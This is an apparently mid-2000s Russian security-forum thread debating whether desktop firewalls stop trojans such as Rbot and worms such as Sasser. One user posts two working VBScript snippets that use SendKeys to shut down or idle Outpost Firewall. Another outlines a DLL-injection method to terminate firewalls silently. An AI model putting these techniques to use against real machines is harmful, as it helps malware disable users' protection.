новый? Backdoor.Win32.Rbot

[Geser]

Сомневаюсь я, однако. Первое, что сделает троянер - это выключит файрволл. И такие штучки посильны каждому ребёнку, который посетил страничку для skriptkiddies.

На сегодня есть не так много троянов отключающих фаервол. Думаю Олег может сказать точнее т.к. он их исследует.
Мало того, многие фаерволы при отключении просто блокируют весь трафик, так что отключение не поможет.

Если говорить о системных уязвимостях, то уместно тут вспомнить SASSER, который внедрялся и в те компьютеры, на которых файрволл был установлен. Так что твой аргумент не убедителен.
А то, что меня уже пару-тройку лет видят в сети меня мало интересует- пусть видят.

Возможно не убедителен потому что ты не совсем представляешь о чем говоришь. Сассер внедрялся на комплутеры с установленным фаерволом только если были разрешены соединения на порт 445, что у многих тогда было в настройках по умолчанию. Но даже в этом случае фаервол блокировал попытку скачать тело трояна. Так что заражения не происходило.
В общем, перед тем как делать самоуверенные заявления нужно учить матчасть.

[Зайцев Олег]

На сегодня есть не так много троянов отключающих фаервол. Думаю Олег может сказать точнее т.к. он их исследует.
Мало того, многие фаерволы при отключении просто блокируют весь трафик, так что отключение не поможет.

Троянов таких много, но отключают то они встроенный Firewall XP(собственно, все отключение сводится банальной правке реестра). А вот прибить или обойти тот-же Outpost, ZA т.п. трояну почти нереально (каждый Firewall в отдельности в чем-то уязвим, но нужно делать трояна под конкретный тип Firewall). Это сложно и потому не получило массового распространения. А в ответ на убиение своих процессов Firewall или отрубают весь трафик, или перезапускают процесс, или вообще плюют на убитый процесс, т.к. фильтрация идет в режиме ядра и управляющая оболочка для этого процесса не нужна.

[aravind]

Всем привет, спасибо за помощь.Напечатал 2 часа назад Вам ответ "Ответить" - он куда-то подевался, что меня лишниу раз убедило-в технике я лох(старенький наверное).Rene-gad прав, я ставил свою ОС сам один раз, пока разбирался, настраивал-весь измучился, так, что переустановка-почти как приговор, но лечиться не отказываюсь- сейчас начну.Просто поллазил по сайтам- столько инфы на тему лечения и предохранения, а разбираться надо. У меня был ко всем ещё один вопросец "о колективной" безопасности, ответ может будет нужен многим - насколько безопасно(или опасно) ставить флэшку, дискету, или CD-RW побывашую на моём компе на другую машину (в случае как с моими вирусами или заразой другого типа)?

[pig]

вопросец "о колективной" безопасности, ответ может будет нужен многим - насколько безопасно(или опасно) ставить флэшку, дискету, или CD-RW побывашую на моём компе на другую машину (в случае как с моими вирусами или заразой другого типа)?

Это рефлекс должен быть - всё, что приносится со стороны, незамедлительно проверяется антивирусом.

[Rene-gad]

На сегодня есть не так много троянов отключающих фаервол.

по теории относительности уже один такой - это много.

Сассер внедрялся на комплутеры с установленным фаерволом только если были разрешены соединения на порт 445, что у многих тогда было в настройках по умолчанию...

А что у кого сейчас стоит в настройках "по умолчанию"? Или тебе всё в хрустальном шарике видать?

В общем, перед тем как делать самоуверенные заявления нужно учить матчасть.

Sorry, а какие заявления ты имеешь ввиду?
Ну проведи у себя эксперимент выключу файрволл на недельку. И я гарантирую, что хуже тебе не будет. Кроме экономии пары десятков Мбайт оперативки - никаких убытков.

А вот прибить или обойти тот-же Outpost, ZA т .п. трояну почти нереально

Аутпост в этом смысле действительно отличается в положительную сторону, но только при условии его правильной конфигурации, на что способны только продвинутые пользователи. Туннелировать же ЗА не представляет большой проблемы. А скрипт для выключения ЗА был даже где-то в интернете помещён, если найду - пришлю.

[Geser]

по теории относительности уже один такой - это много.

А что у кого сейчас стоит в настройках "по умолчанию"? Или тебе всё в хрустальном шарике видать?

Sorry, а какие заявления ты имеешь ввиду?
Ну проведи у себя эксперимент выключу файрволл на недельку. И я гарантирую, что хуже тебе не будет. Кроме экономии пары десятков Мбайт оперативки - никаких убытков.

Аутпост в этом смысле действительно отличается в положительную сторону, но только при условии его правильной конфигурации, на что способны только продвинутые пользователи. Туннелировать же ЗА не представляет большой проблемы. А скрипт для выключения ЗА был даже где-то в интернете помещён, если найду - пришлю.

Я не в хрустальном шаре вижу. Я прост ставил фаерволы и знаю что сейчас многие в установках по умолчанию блокируют netbios для не локальных сетей.
У меня самого Аутпост тогда пропустил атаку Сасера, но заблокировал попытку скачать тело трояна.

По поводу убиения Олег ответил достаточно ясно. Большинство троянов убить фаервол не способны. А рссуждения на уровне "Не даёт 100% защиты - не нужно ставить" это детский сад.

[Rene-gad]

Большинство троянов убить фаервол не способны.

Повторю для особо непонятливых - в этом случае одного вполне достаточно.

А рссуждения на уровне "Не даёт 100% защиты - не нужно ставить" это детский сад.

А где я говорил про 100%? Я говорил и говорю, что десктоп-файрволл не усиливает сам по себе защиту компьютера.

[Geser]

Повторю для особо непонятливых - в этом случае одного вполне достаточно.

А где я говорил про 100%? Я говорил и говорю, что десктоп-файрволл не усиливает сам по себе защиту компьютера.

Я уж на конктерном своём примере показал что усиливает, а ты всё за своё.

[Rene-gad]

Я уж на конктерном своём примере показал что усиливает, а ты всё за своё.

Sorry, но во-первых, Аутпост, по твоему же сообщению, пропустил атаку, во-вторых Sasser не троян, а червь (это к вопросу о матчасти), в-третьих ссылка, которую я обещал Олегу я к сожалению не нашёл. Нашёл другую, не хуже. Посылаю через приватное сообщвние Олегу и тебе. Ну а остальным, кто заинтересуется, тоже могу.

[Rene-gad]

@aravind

У меня был ко всем ещё один вопросец "о колективной" безопасности, ответ может будет нужен многим - насколько безопасно(или опасно) ставить флэшку, дискету, или CD-RW побывашую на моём компе на другую машину (в случае как с моими вирусами или заразой другого типа)?

Проверять на вирусы рекомендуется в любом случае.

я ставил свою ОС сам один раз, пока разбирался, настраивал-весь измучился, так, что переустановка-почти как приговор

Ну так второй раз пойдёт на автомате . Вы поступите так, как сочтёте нужным - это абсолютно понятно. По моему разумению просто переустановка системы идёт быстрее, чем её очистка. Вы провели в Форуме уже больше суток. За это время средний пользователь в состоянии переустановить Виндовс на 5 компьютерах. Я могу Вам ссылочку к одному хорошему руководству по установке Виндовс дать. к сожалению на немцком, но с картинками, так что может быть и поможет.
ПДФ-Файл-Скачать

[Geser]

Sorry, но во-первых, Аутпост, по твоему же сообщению, пропустил атаку, во-вторых Sasser не троян, а червь (это к вопросу о матчасти), в-третьих ссылка, которую я обещал Олегу я к сожалению не нашёл. Нашёл другую, не хуже. Посылаю через приватное сообщвние Олегу и тебе. Ну а остальным, кто заинтересуется, тоже могу.

1.Разница между трояном и червём только в способе распространения. В данном случае не принципиально.
2. Атаку пропустил а заражение предотвратил. Важен конечный результат. А конечный результат именно такой какой и нужен.
3. Этот код, который ты послал, может и действует против ЗА, а может уже и не актуален для новых версий. Потом, у меня стоит не ЗА, так что мне с этого кода? Большенство троянов мою стенку не обойдут. Мне этого достаточно.

[orvman]

Зайцев Олег

вот прибить или обойти тот-же Outpost, ZA т.п. трояну почти нереально (каждый Firewall в отдельности в чем-то уязвим, но нужно делать трояна под конкретный тип Firewall).

Вот именно, накатать код - под определенный тип не так сложно. В принципе, никто и не ставит себе цель писать варианты под разные фаеры и т.д., награмождая тем самым тело всякой фигней - делается все проще.

Rene-gad

А скрипт для выключения ЗА был даже где-то в интернете помещён, если найду - пришлю.

Старо уже, но вырубить можно все, что связано с окнами и т.д., т.е. юзая элементарные методы, я уже не говорю о заумных.

Geser

Этот код, который ты послал, может и действует против ЗА, а может уже и не актуален для новых версий. Потом, у меня стоит не ЗА, так что мне с этого кода? Большенство троянов мою стенку не обойдут. Мне этого достаточно.

А ну-ка давай-ка вот так:
Вариант 1. (Выход с остановкой Outpost)
1. Открываем блокнот и пихаем туда код:

set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

2. Сохраняем файл с расширением .vbs
3. Делаем так: Закрываем все открытые окна в Винде
4. Пуск - Выполнить - Обзор - ну и запускаем его.
5. Наслаждаемся полученными результатами.
P.S. Все данный код не является трояном и т.д. и не делает деструктивных действий.
Вариант 2. Перевод OP в режим бездействия:
1. Ставим ОР в режим Обучения (в режиме Блокировки придется в код добавить еще один ключ {LEFT}
2.

set WShell = CreateObject("WScript.Shell")
WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 100
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
WScript.Sleep 10
WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
WScript.Sleep 10
WShell.SendKeys "{LEFT}{LEFT}{ENTER}"
WScript.Sleep 10
WShell.SendKeys "{ENTER}"

3. Делаем все, что в первом варианте.
4. Приятного времяпрепровождения в сети.
Вывод: нех. запускать все подряд, так можно вырубить все, что угодно - любую программную защиту, используя даже простые скрипты.
Желающие могут легко протестировать любую защиту. Пишутся скрипты в несколько минут. Инфу можно найти в справке к Винде.

[Geser]

А для параноиков есть возможность установки пароля. И все эти скрипты тогда ничего сделать не могут.

Кстати, у меня сейчас и не Outpost тоже

[Sanja]

Тогда мы драйверу передаем зарание известный контрол и он не блокирует интернет после убийства оутпоста Ж)

[Geser]

Тогда мы драйверу передаем зарание известный контрол и он не блокирует интернет после убийства оутпоста Ж)

Это всё в теории. Потому как написать троян отключающий все известные FW малореально. Это не процессы по списку убивать.

[Sanja]

Невижу трудностей...

1. на своем помпе создаем дллку которая перехватывает апи посылки команд драйверу, инжектим ее в оутпост и нажимает выход. Мы получам то что шлет оутпост драйверу при выходе (подтверждение нормального выхода)

2. создаем дллку которую на нужном компе инжектица в процесс оутпоста, посылает команду драйверу и вызывает апи - ExitProcess(0);

Но мне почему то кажется что ничего драйверу посылать ненадо а достаточно просто чтобы пид вызвавшего zwTerminateProcess(OutputProcessPid) равнялся пиду оутпоста - тоесть инжектнуть дллку или создать удаленный поток в оутпосте который вызовет ExitProcess(0);

1 из 2х методов прокатит со всеми известными мне файрваллами. (и не только)

[Rene-gad]

Это всё в теории. Потому как написать троян отключающий все известные FW малореально..

...но не невозможно. Потренироваться можно с этим (скачать). Оригинальная статья на немцком, перевести можно через гугловский онлайн переводчик или тут.
EDIT: Sanja - быстрые пальцы